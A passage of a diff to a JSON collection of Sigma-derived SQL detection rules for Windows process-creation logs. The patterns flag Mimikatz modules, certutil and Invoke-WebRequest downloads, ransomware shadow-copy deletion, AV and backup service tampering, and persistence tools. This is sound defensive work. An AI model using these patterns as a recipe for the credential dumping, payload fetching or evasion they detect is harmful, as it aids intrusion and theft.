OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", - "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'psloglist.exe' OR (NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_sysinternals_psloglist.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Execution Of PDQDeployRunner", + "id": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the PDQDeploy tool to execute these commands" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%PDQDeployRunner-%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\') OR (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -encodedcommand %' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% -w hidden%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "PUA - AdvancedRun Execution", + "id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "description": "Detects the execution of AdvancedRun utility", "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'AdvancedRun.exe' OR (CommandLine LIKE '% /EXEFilename %' ESCAPE '\\' AND CommandLine LIKE '% /Run%' ESCAPE '\\') OR (CommandLine LIKE '% /WindowState 0%' ESCAPE '\\' AND CommandLine LIKE '% /RunAs %' ESCAPE '\\' AND CommandLine LIKE '% /CommandLine %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" + "filename": "proc_creation_win_pua_advancedrun.yml" }, { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", - "author": "Florian Roth (Nextron Systems)", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", - "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "HackTool - SharPersist Execution", - "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "title": "Unusual Parent Process For Cmd.EXE", + "id": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", "status": "experimental", - "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious parent process for cmd.exe", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.t1053" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ctfmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\epad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\FlashPlayerUpdateService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\GoogleUpdate.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jucheck.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\slui.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\sppsvc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\unsecapp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wergmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WUDFHost.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpersist.yml" + "filename": "proc_creation_win_cmd_unusual_parent.yml" }, { - "title": "HackTool - SharpEvtMute Execution", - "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "title": "Suspicious ScreenSave Change by Reg.exe", + "id": "0fc35fc3-efe6-4898-8a37-0b233339524f", "status": "experimental", - "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "author": "frack113", + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ], + "falsepositives": [ + "GPO" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop%' ESCAPE '\\' OR CommandLine LIKE '%HKCU\\\\Control Panel\\\\Desktop%' ESCAPE '\\')) AND ((CommandLine LIKE '%/v ScreenSaveActive%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 1%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaveTimeout%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v ScreenSaverIsSecure%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d 0%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\') OR (CommandLine LIKE '%/v SCRNSAVE.EXE%' ESCAPE '\\' AND CommandLine LIKE '%/t REG\\_SZ%' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%.scr%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_reg_screensaver.yml" + }, + { + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", + "status": "test", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Suspicious Windows Service Tampering", - "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1489" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE 